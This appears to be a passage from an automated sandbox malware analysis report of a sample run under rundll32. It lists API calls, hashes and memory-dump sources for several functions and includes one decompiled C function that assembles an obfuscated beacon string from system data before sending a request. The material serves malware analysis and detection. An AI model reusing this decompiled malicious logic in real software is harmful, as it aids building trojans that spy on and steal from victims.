                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05B63D1A
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05B63D26
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 05B63D32
                          • RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 05B63D41
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wait$CloseHandleObjectSingle$TimerWaitable$MultipleObjects$HeapMutexRelease_allmul$FreeThread$CreateErrorEventLastSwitchTime$AllocateExitFileOpenResetSystemTrimUser
                          • String ID:
                          • API String ID: 2369282788-0
                          • Opcode ID: e1be5d5325b375044f49a6e24549d20da011e9ca6e90388f6b693e4dba225638
                          • Instruction ID: cdd72b7c80d507d72e9dcc16586a5f2ce5492539414096f4b0680061d47f5f9a
                          • Opcode Fuzzy Hash: e1be5d5325b375044f49a6e24549d20da011e9ca6e90388f6b693e4dba225638
                          • Instruction Fuzzy Hash: 0CE19B71508305AFDB11AF64CC8597ABBEAFB84364F141A6AF596931A0DB38FC00CF12
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7F1C4 Relevance: 43.8, APIs: 29, Instructions: 271memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL ref: 05B7F1E5
                          • GetTickCount.KERNEL32 ref: 05B7F1FF
                          • wsprintfA.USER32 ref: 05B7F252
                          • QueryPerformanceFrequency.KERNEL32(?), ref: 05B7F25E
                          • QueryPerformanceCounter.KERNEL32(?), ref: 05B7F269
                          • _aulldiv.NTDLL(?,?,?,?), ref: 05B7F27F
                          • wsprintfA.USER32 ref: 05B7F295
                          • wsprintfA.USER32 ref: 05B7F2AF
                          • wsprintfA.USER32 ref: 05B7F2D4
                          • HeapFree.KERNEL32(00000000,?), ref: 05B7F2E7
                          • wsprintfA.USER32 ref: 05B7F30B
                          • HeapFree.KERNEL32(00000000,?), ref: 05B7F31E
                          • wsprintfA.USER32 ref: 05B7F358
                          • wsprintfA.USER32 ref: 05B7F37C
                          • lstrcat.KERNEL32(?,?), ref: 05B7F3B4
                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 05B7F3CE
                          • GetTickCount.KERNEL32 ref: 05B7F3DE
                          • RtlEnterCriticalSection.NTDLL(05FBC2D0), ref: 05B7F3F2
                          • RtlLeaveCriticalSection.NTDLL(05FBC2D0), ref: 05B7F410
                          • StrTrimA.SHLWAPI(00000000,05B853E8,00000000,05FBC310), ref: 05B7F449
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B7F46B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 05B7F472
                          • lstrcat.KERNEL32(00000000,?), ref: 05B7F479
                          • lstrcat.KERNEL32(00000000,?), ref: 05B7F480
                          • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 05B7F4FA
                          • HeapFree.KERNEL32(00000000,?,00000000), ref: 05B7F50C
                          • HeapFree.KERNEL32(00000000,00000000,00000000,05FBC310), ref: 05B7F51B
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7F52D
                          • HeapFree.KERNEL32(00000000,?), ref: 05B7F53F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Freewsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveTrim_aulldiv
                          • String ID:
                          • API String ID: 4198993012-0
                          • Opcode ID: 5f23d2901680bcf38dcbed03ef03f3e26f4f50bf2474460182a0b5a83b2e611e
                          • Instruction ID: 96a19cfcb76108426d2220f3eb4417924b9ca0144e4367c28bca09d9bd256b5c
                          • Opcode Fuzzy Hash: 5f23d2901680bcf38dcbed03ef03f3e26f4f50bf2474460182a0b5a83b2e611e
                          • Instruction Fuzzy Hash: E0A16671114209AFCB11DFA8EC86E7A3FAAFF08214F04146AF519D7260EB34F819DB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B77AEF Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 389memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000000,?,?), ref: 05B77B51
                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05B77BED
                          • lstrcpyn.KERNEL32(00000000,?,?), ref: 05B77C02
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B77C1D
                          • StrChrA.SHLWAPI(?,00000020,00000000,?,?,?), ref: 05B77D04
                          • StrChrA.SHLWAPI(00000001,00000020), ref: 05B77D15
                          • lstrlen.KERNEL32(00000000), ref: 05B77D29
                          • memmove.NTDLL(?,?,00000001), ref: 05B77D39
                          • lstrlen.KERNEL32(?,00000000,?,?,?), ref: 05B77D65
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B77D8B
                          • memcpy.NTDLL(00000000,?,?), ref: 05B77D9F
                          • memcpy.NTDLL(?,?,?), ref: 05B77DBF
                          • HeapFree.KERNEL32(00000000,?), ref: 05B77DFB
                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05B77EC1
                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 05B77F09
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                          • String ID: GET $GET $OPTI$OPTI$POST$PUT
                          • API String ID: 3227826163-647159250
                          • Opcode ID: 46cd3a29c65447ba3a1bcbeaba24c9f778d71b227561539ecb877001ee20ef9d
                          • Instruction ID: 145d24f8d5b772dee3613973d180eee4cf166fb82b74170079b33b56458acffd
                          • Opcode Fuzzy Hash: 46cd3a29c65447ba3a1bcbeaba24c9f778d71b227561539ecb877001ee20ef9d
                          • Instruction Fuzzy Hash: 1FE13C71A00209EFDB15DFA8C889ABE7BB9FF04310F144599F9269B251DB30FA51DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6E627 Relevance: 36.3, APIs: 24, Instructions: 288memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL ref: 05B6E65B
                          • wsprintfA.USER32 ref: 05B6E6C5
                          • wsprintfA.USER32 ref: 05B6E70B
                          • wsprintfA.USER32 ref: 05B6E72C
                          • lstrcat.KERNEL32(00000000,?), ref: 05B6E763
                          • wsprintfA.USER32 ref: 05B6E784
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B6E79E
                          • wsprintfA.USER32 ref: 05B6E7C5
                          • HeapFree.KERNEL32(00000000,?), ref: 05B6E7DA
                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 05B6E7F4
                          • RtlEnterCriticalSection.NTDLL(05FBC2D0), ref: 05B6E815
                          • RtlLeaveCriticalSection.NTDLL(05FBC2D0), ref: 05B6E82F
                            • Part of subcall function 05B7EA15: lstrlen.KERNEL32(00000000,76CC81D0,?,76C85520,773BEEF0,?,00000000,05B6E842,00000000,05FBC310), ref: 05B7EA40
                            • Part of subcall function 05B7EA15: lstrlen.KERNEL32(?,?,00000000,05B6E842,00000000,05FBC310), ref: 05B7EA48
                            • Part of subcall function 05B7EA15: strcpy.NTDLL ref: 05B7EA5F
                            • Part of subcall function 05B7EA15: lstrcat.KERNEL32(00000000,?), ref: 05B7EA6A
                            • Part of subcall function 05B7EA15: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,05B6E842,00000000,05FBC310), ref: 05B7EA87
                          • StrTrimA.SHLWAPI(00000000,05B853E8,00000000,05FBC310), ref: 05B6E864
                            • Part of subcall function 05B68DC7: lstrlen.KERNEL32(05FB8560,76C85520,76CC81D0,773BEEF0,05B6E873,?), ref: 05B68DD7
                            • Part of subcall function 05B68DC7: lstrlen.KERNEL32(?), ref: 05B68DDF
                            • Part of subcall function 05B68DC7: lstrcpy.KERNEL32(00000000,05FB8560), ref: 05B68DF3
                            • Part of subcall function 05B68DC7: lstrcat.KERNEL32(00000000,?), ref: 05B68DFE
                          • lstrcpy.KERNEL32(?,?), ref: 05B6E88D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 05B6E897
                          • lstrcat.KERNEL32(00000000,?), ref: 05B6E8A2
                          • lstrcat.KERNEL32(00000000,?), ref: 05B6E8A9
                          • RtlEnterCriticalSection.NTDLL(05FBC2D0), ref: 05B6E8B4
                          • RtlLeaveCriticalSection.NTDLL(05FBC2D0), ref: 05B6E8D0
                            • Part of subcall function 05B67DF5: memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,05B75583,00000000,00000000), ref: 05B67E46
                            • Part of subcall function 05B67DF5: memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 05B67ED9
                          • HeapFree.KERNEL32(00000000,?,00000001,05FBC310,?,?,?), ref: 05B6E997
                          • HeapFree.KERNEL32(00000000,?,?), ref: 05B6E9AF
                          • HeapFree.KERNEL32(00000000,?,00000000,05FBC310), ref: 05B6E9BD
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B6E9CB
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B6E9D6
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$lstrcatwsprintf$CriticalSectionlstrlen$lstrcpy$AllocateEnterLeaveTrimmemcpy$strcpy
                          • String ID:
                          • API String ID: 4032678529-0
                          • Opcode ID: dcdf23b368fa2ff96121d499dc17f89bcb75835a0f0c914b333f5dfda9063390
                          • Instruction ID: 4793367c9d9874dad6ff589da893b3cb6a620b92595afd18a4a70674e79ec81f
                          • Opcode Fuzzy Hash: dcdf23b368fa2ff96121d499dc17f89bcb75835a0f0c914b333f5dfda9063390
                          • Instruction Fuzzy Hash: 48B15531214205AFCB119FA8DC85E3A7BEAFF88314F04146AF549DB2A0DB39F805DB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0100300E Relevance: 36.3, APIs: 24, Instructions: 266memorystringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 75%
                          			E0100300E(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
				intOrPtr _v4;
				signed int _v8;
				int* _v12;
				char* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				long _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				void* _t74;
				intOrPtr _t75;
				int _t78;
				intOrPtr _t79;
				int _t82;
				intOrPtr _t83;
				intOrPtr _t84;
				void* _t86;
				void* _t89;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr* _t99;
				int* _t105;
				int* _t115;
				char** _t117;
				char* _t118;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t136;
				int _t139;
				intOrPtr _t141;
				int _t144;
				void* _t145;
				intOrPtr _t159;
				void* _t161;
				int _t162;
				void* _t163;
				void* _t164;
				long _t165;
				intOrPtr* _t166;
				intOrPtr* _t167;
				intOrPtr _t168;
				intOrPtr* _t171;
				char** _t174;
				char** _t176;
				char** _t177;
				void* _t182;

				_t66 = __eax;
				_t174 =  &_v16;
				_t145 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t66 = GetTickCount();
				}
				_t67 =  *0x100a018; // 0xd4967592
				asm("bswap eax");
				_t68 =  *0x100a014; // 0x3a87c8cd
				asm("bswap eax");
				_t69 =  *0x100a010; // 0xd8d2f808
				asm("bswap eax");
				_t70 =  *0x100a00c; // 0x81762942
				asm("bswap eax");
				_t71 =  *0x100a348; // 0x428d5a8
				_t3 = _t71 + 0x100b62b; // 0x74666f73
				_t162 = wsprintfA(_t145, _t3, 3, 0x3d175, _t70, _t69, _t68, _t67,  *0x100a02c,  *0x100a004, _t66);
				_t74 = E01006927();
				_t75 =  *0x100a348; // 0x428d5a8
				_t4 = _t75 + 0x100b66b; // 0x74707526
				_t78 = wsprintfA(_t162 + _t145, _t4, _t74);
				_t176 =  &(_t174[0xe]);
				_t163 = _t162 + _t78;
				if(_a24 != 0) {
					_t141 =  *0x100a348; // 0x428d5a8
					_t8 = _t141 + 0x100b676; // 0x732526
					_t144 = wsprintfA(_t163 + _t145, _t8, _a24);
					_t176 =  &(_t176[3]);
					_t163 = _t163 + _t144;
				}
				_t79 =  *0x100a348; // 0x428d5a8
				_t10 = _t79 + 0x100b78e; // 0x5298d36
				_t182 = _a20 - _t10;
				_t12 = _t79 + 0x100b2de; // 0x74636126
				_t157 = 0 | _t182 == 0x00000000;
				_t82 = wsprintfA(_t163 + _t145, _t12, _t182 == 0);
				_t177 =  &(_t176[3]);
				_t164 = _t163 + _t82;
				_t83 = E010022D7(_t10);
				_a32 = _t83;
				if(_t83 != 0) {
					_t136 =  *0x100a348; // 0x428d5a8
					_t17 = _t136 + 0x100b8d0; // 0x736e6426
					_t139 = wsprintfA(_t164 + _t145, _t17, _t83);
					_t177 =  &(_t177[3]);
					_t164 = _t164 + _t139;
					HeapFree( *0x100a2d8, 0, _a40);
				}
				_t84 = E01002A11();
				_a32 = _t84;
				if(_t84 != 0) {
					_t132 =  *0x100a348; // 0x428d5a8
					_t21 = _t132 + 0x100b8d8; // 0x6f687726
					wsprintfA(_t164 + _t145, _t21, _t84);
					_t177 =  &(_t177[3]);
					HeapFree( *0x100a2d8, 0, _a40);
				}
				_t159 =  *0x100a3cc; // 0x52995b0
				_t86 = E01002509(0x100a00a, _t159 + 4);
				_t165 = 0;
				_a16 = _t86;
				if(_t86 == 0) {
					L28:
					HeapFree( *0x100a2d8, _t165, _t145);
					return _a44;
				} else {
					_t89 = RtlAllocateHeap( *0x100a2d8, 0, 0x800);
					_a24 = _t89;
					if(_t89 == 0) {
						L27:
						HeapFree( *0x100a2d8, _t165, _a8);
						goto L28;
					}
					E01001BE9(GetTickCount());
					_t93 =  *0x100a3cc; // 0x52995b0
					__imp__(_t93 + 0x40);
					asm("lock xadd [eax], ecx");
					_t97 =  *0x100a3cc; // 0x52995b0
					__imp__(_t97 + 0x40);
					_t99 =  *0x100a3cc; // 0x52995b0
					_t161 = E01001D33(1, _t157, _t145,  *_t99);
					asm("lock xadd [eax], ecx");
					if(_t161 == 0) {
						L26:
						HeapFree( *0x100a2d8, _t165, _a16);
						goto L27;
					}
					StrTrimA(_t161, 0x100928c);
					_push(_t161);
					_t105 = E0100393C();
					_v12 = _t105;
					if(_t105 == 0) {
						L25:
						HeapFree( *0x100a2d8, _t165, _t161);
						goto L26;
					}
					_t166 = __imp__;
					 *_t166(_t161, _a8);
					 *_t166(_a4, _v12);
					_t167 = __imp__;
					 *_t167(_v4, _v24);
					_t168 = E010061FC( *_t167(_v12, _t161), _v20);
					_v36 = _t168;
					if(_t168 == 0) {
						_v8 = 8;
						L23:
						E0100561E();
						L24:
						HeapFree( *0x100a2d8, 0, _v40);
						_t165 = 0;
						goto L25;
					}
					_t115 = E010010B7(_t145, 0xffffffffffffffff, _t161,  &_v24);
					_v12 = _t115;
					if(_t115 == 0) {
						_t171 = _v24;
						_v20 = E01005B9D(_t171, _t168, _v16, _v12);
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E01006C2C(_t171);
					}
					if(_v8 != 0x10d2) {
						L18:
						if(_v8 == 0) {
							_t117 = _v16;
							if(_t117 != 0) {
								_t118 =  *_t117;
								_t169 =  *_v12;
								_v16 = _t118;
								wcstombs(_t118, _t118,  *_v12);
								 *_v24 = E01003C22(_v16, _v16, _t169 >> 1);
							}
						}
						goto L21;
					} else {
						if(_v16 != 0) {
							L21:
							E01006C2C(_v32);
							if(_v12 == 0 || _v8 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L18;
					}
				}
			}




























































                          0x0100300e
                          0x0100300e
                          0x01003012
                          0x01003019
                          0x01003023
                          0x01003025
                          0x01003025
                          0x01003032
                          0x0100303d
                          0x01003040
                          0x0100304b
                          0x0100304e
                          0x01003053
                          0x01003056
                          0x0100305b
                          0x0100305e
                          0x0100306a
                          0x01003077
                          0x01003079
                          0x0100307f
                          0x01003084
                          0x0100308f
                          0x01003091
                          0x01003094
                          0x0100309b
                          0x0100309d
                          0x010030a6
                          0x010030b1
                          0x010030b3
                          0x010030b6
                          0x010030b6
                          0x010030b8
                          0x010030bd
                          0x010030c5
                          0x010030c9
                          0x010030cf
                          0x010030d8
                          0x010030da
                          0x010030dd
                          0x010030df
                          0x010030ea
                          0x010030f0
                          0x010030f3
                          0x010030f8
                          0x01003103
                          0x01003105
                          0x0100310c
                          0x01003116
                          0x01003116
                          0x01003118
                          0x0100311d
                          0x01003123
                          0x01003126
                          0x0100312b
                          0x01003135
                          0x01003137
                          0x01003146
                          0x01003146
                          0x01003148
                          0x01003156
                          0x0100315b
                          0x0100315d
                          0x01003163
                          0x01003343
                          0x0100334b
                          0x01003358
                          0x01003169
                          0x01003175
                          0x0100317b
                          0x01003181
                          0x01003336
                          0x01003341
                          0x00000000
                          0x01003341
                          0x0100318d
                          0x01003192
                          0x0100319b
                          0x010031ac
                          0x010031b0
                          0x010031b9
                          0x010031bf
                          0x010031cc
                          0x010031d9
                          0x010031df
                          0x01003329
                          0x01003334
                          0x00000000
                          0x01003334
                          0x010031eb
                          0x010031f1
                          0x010031f2
                          0x010031f7
                          0x010031fd
                          0x0100331f
                          0x01003327
                          0x00000000
                          0x01003327
                          0x01003207
                          0x0100320e
                          0x01003218
                          0x0100321e
                          0x01003228
                          0x0100323a
                          0x0100323c
                          0x01003242
                          0x0100335b
                          0x0100330a
                          0x0100330a
                          0x0100330f
                          0x0100331b
                          0x0100331d
                          0x00000000
                          0x0100331d
                          0x0100324d
                          0x01003252
                          0x01003258
                          0x01003263
                          0x0100326e
                          0x01003272
                          0x01003278
                          0x0100327e
                          0x01003284
                          0x01003287
                          0x0100328d
                          0x01003290
                          0x01003295
                          0x01003299
                          0x01003299
                          0x010032a6
                          0x010032b4
                          0x010032b9
                          0x010032bb
                          0x010032c1
                          0x010032c7
                          0x010032c9
                          0x010032ce
                          0x010032d2
                          0x010032ee
                          0x010032ee
                          0x010032c1
                          0x00000000
                          0x010032a8
                          0x010032ad
                          0x010032f0
                          0x010032f4
                          0x010032fe
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x010032fe
                          0x010032af
                          0x00000000
                          0x010032af
                          0x010032a6

                          APIs
                          • GetTickCount.KERNEL32 ref: 01003025
                          • wsprintfA.USER32 ref: 01003072
                          • wsprintfA.USER32 ref: 0100308F
                          • wsprintfA.USER32 ref: 010030B1
                          • wsprintfA.USER32 ref: 010030D8
                          • wsprintfA.USER32 ref: 01003103
                          • HeapFree.KERNEL32(00000000,?), ref: 01003116
                          • wsprintfA.USER32 ref: 01003135
                          • HeapFree.KERNEL32(00000000,?), ref: 01003146
                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01003175
                          • GetTickCount.KERNEL32 ref: 01003187
                          • RtlEnterCriticalSection.NTDLL(05299570), ref: 0100319B
                          • RtlLeaveCriticalSection.NTDLL(05299570), ref: 010031B9
                            • Part of subcall function 01001D33: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,75BCC740,010058D7,00000000,052995B0), ref: 01001D5E
                            • Part of subcall function 01001D33: lstrlen.KERNEL32(00000000,?,75BCC740,010058D7,00000000,052995B0), ref: 01001D66
                            • Part of subcall function 01001D33: strcpy.NTDLL ref: 01001D7D
                            • Part of subcall function 01001D33: lstrcat.KERNEL32(00000000,00000000), ref: 01001D88
                            • Part of subcall function 01001D33: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,010058D7,?,75BCC740,010058D7,00000000,052995B0), ref: 01001DA5
                          • StrTrimA.SHLWAPI(00000000,0100928C,?,052995B0), ref: 010031EB
                            • Part of subcall function 0100393C: lstrlen.KERNEL32(05299B68,00000000,00000000,00000000,01005902,00000000), ref: 0100394C
                            • Part of subcall function 0100393C: lstrlen.KERNEL32(?), ref: 01003954
                            • Part of subcall function 0100393C: lstrcpy.KERNEL32(00000000,05299B68), ref: 01003968
                            • Part of subcall function 0100393C: lstrcat.KERNEL32(00000000,?), ref: 01003973
                          • lstrcpy.KERNEL32(00000000,?), ref: 0100320E
                          • lstrcpy.KERNEL32(?,?), ref: 01003218
                          • lstrcat.KERNEL32(?,?), ref: 01003228
                          • lstrcat.KERNEL32(?,00000000), ref: 0100322F
                            • Part of subcall function 010061FC: lstrlen.KERNEL32(?,00000000,05299D70,00000000,010039E8,05299F93,69B25F44,?,?,?,?,69B25F44,00000005,0100A00C,4D283A53,?), ref: 01006203
                            • Part of subcall function 010061FC: mbstowcs.NTDLL ref: 0100622C
                            • Part of subcall function 010061FC: memset.NTDLL ref: 0100623E
                          • wcstombs.NTDLL ref: 010032D2
                            • Part of subcall function 01005B9D: SysAllocString.OLEAUT32(?), ref: 01005BD8
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          • HeapFree.KERNEL32(00000000,?), ref: 0100331B
                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01003327
                          • HeapFree.KERNEL32(00000000,?,?,052995B0), ref: 01003334
                          • HeapFree.KERNEL32(00000000,?), ref: 01003341
                          • HeapFree.KERNEL32(00000000,?), ref: 0100334B
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Heap$Free$wsprintf$lstrlen$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                          • String ID:
                          • API String ID: 967369141-0
                          • Opcode ID: 29c9deb8247ffa69713222c17d711ccec9b81d0a1a0e30ea18a1b0c5f4231ebb
                          • Instruction ID: db4758bc6056aa706135e72c19443af3e325773fe049575cdbc53cb80556e64e
                          • Opcode Fuzzy Hash: 29c9deb8247ffa69713222c17d711ccec9b81d0a1a0e30ea18a1b0c5f4231ebb
                          • Instruction Fuzzy Hash: 3EA17971600315EFE763EB68DC88E9A7BE8FB88714F044828F5C8D7261CA3AD944CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7CEB7 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 219memoryfilestringCOMMON
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32 ref: 05B7CED3
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B7CEEF
                          • GetLastError.KERNEL32 ref: 05B7CF3E
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7CF54
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B7CF68
                          • GetLastError.KERNEL32 ref: 05B7CF82
                          • GetLastError.KERNEL32 ref: 05B7CFB5
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7CFD3
                          • lstrlenW.KERNEL32(00000000,?), ref: 05B7CFFF
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05B7D014
                          • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 05B7D0E8
                          • HeapFree.KERNEL32(00000000,?), ref: 05B7D0F7
                          • WaitForSingleObject.KERNEL32(00000000), ref: 05B7D10C
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7D11F
                          • HeapFree.KERNEL32(00000000,?), ref: 05B7D131
                          • RtlExitUserThread.NTDLL(?,?), ref: 05B7D146
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                          • String ID:
                          • API String ID: 3853681310-3916222277
                          • Opcode ID: 6454a4a0f7d4e9cf053aa3ef17408e663c6e6bc50fa484886792263920ff5aa4
                          • Instruction ID: 046cc76d7e77232839eac0d00bfae5eeecb3ee127906f05c78b9e1185940f55b
                          • Opcode Fuzzy Hash: 6454a4a0f7d4e9cf053aa3ef17408e663c6e6bc50fa484886792263920ff5aa4
                          • Instruction Fuzzy Hash: 8E813C71910209BFDB209FA4DC89EBE7FBAFB09214F10105AF525E7250DB35B949DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B77F79 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 131memoryregistrythreadCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05B77F9B
                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 05B77FB8
                          • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 05B78008
                          • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 05B78012
                          • GetLastError.KERNEL32 ref: 05B7801C
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B7802D
                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 05B7804F
                          • HeapFree.KERNEL32(00000000,?), ref: 05B78086
                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05B7809A
                          • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 05B780A3
                          • SuspendThread.KERNEL32(?), ref: 05B780B2
                          • CreateEventA.KERNEL32(05B8A1E8,00000001,00000000), ref: 05B780C6
                          • SetEvent.KERNEL32(00000000), ref: 05B780D3
                          • CloseHandle.KERNEL32(00000000), ref: 05B780DA
                          • Sleep.KERNEL32(000001F4), ref: 05B780ED
                          • ResumeThread.KERNEL32(?), ref: 05B78111
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                          • String ID: v
                          • API String ID: 1011176505-1801730948
                          • Opcode ID: 28db31c3afb4b7409d55013a0a4f64071c5b8e4190fa551b697bd16fbdc83e74
                          • Instruction ID: b5b627e8ea70fce33844f0ae41e27a47b571589bf0cb81f44d8d41e422dd71a6
                          • Opcode Fuzzy Hash: 28db31c3afb4b7409d55013a0a4f64071c5b8e4190fa551b697bd16fbdc83e74
                          • Instruction Fuzzy Hash: 9C414B72910149FFCB20AFA4DC899BD7FBAFB04354B1450AAF622E3150DB31B985DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B62C62 Relevance: 27.3, APIs: 18, Instructions: 275memorystringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 05B81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F02
                            • Part of subcall function 05B81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05B81F16
                            • Part of subcall function 05B81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05B62C89,?), ref: 05B81F30
                            • Part of subcall function 05B81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05B62C89,?,?,?), ref: 05B81F5A
                          • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 05B62CA9
                          • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 05B62CC7
                          • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 05B62CF3
